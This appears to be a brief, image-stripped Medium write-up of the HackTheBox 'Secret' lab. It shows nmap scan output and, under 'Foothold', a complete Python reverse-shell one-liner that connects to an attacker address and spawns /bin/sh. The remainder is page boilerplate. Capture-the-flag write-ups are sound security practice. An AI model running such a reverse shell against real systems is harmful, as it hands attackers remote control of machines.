HackTheBox-Secret

NMAP

PORT     STATE SERVICE REASON         VERSION       
22/tcp open ssh syn-ack ttl 63 OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
80/tcp open http syn-ack ttl 63 nginx 1.18.0 (Ubuntu)
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: nginx/1.18.0 (Ubuntu)
|_http-title: DUMB Docs
3000/tcp open http syn-ack ttl 63 Node.js (Express middleware)
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-title: DUMB Docs
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

PORT 80/3000 (HTTP)

Foothold

python3 -c 'import socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.29",2222));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/sh")'

Privilege Escalation

References

--

--

--

Pentester | CTF Player

Love podcasts or audiobooks? Learn on the go with our new app.

Recommended from Medium

OpenLampTech issue #10

The search is dead, long live the Search!

SQL CRUD Basics Part 4 — Delete.

Creating a RESTful CRUD API in ASP.Net Core (.NET 5) with MongoDB

Solar Dex and Eco-System Update

Deploying static website to Azure Blog Storage with Azure DevOps and Cache Control JAM Stack

Get Ready for 2022…

Export Query Results to CSV with MySQL Workbench

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
ARZ101

ARZ101

Pentester | CTF Player

More from Medium

TryHackMe: UltraTech

HackTheBox-Bolt

Attacktive Directory | TryHackMe

Secret — Hackthebox Walkthrough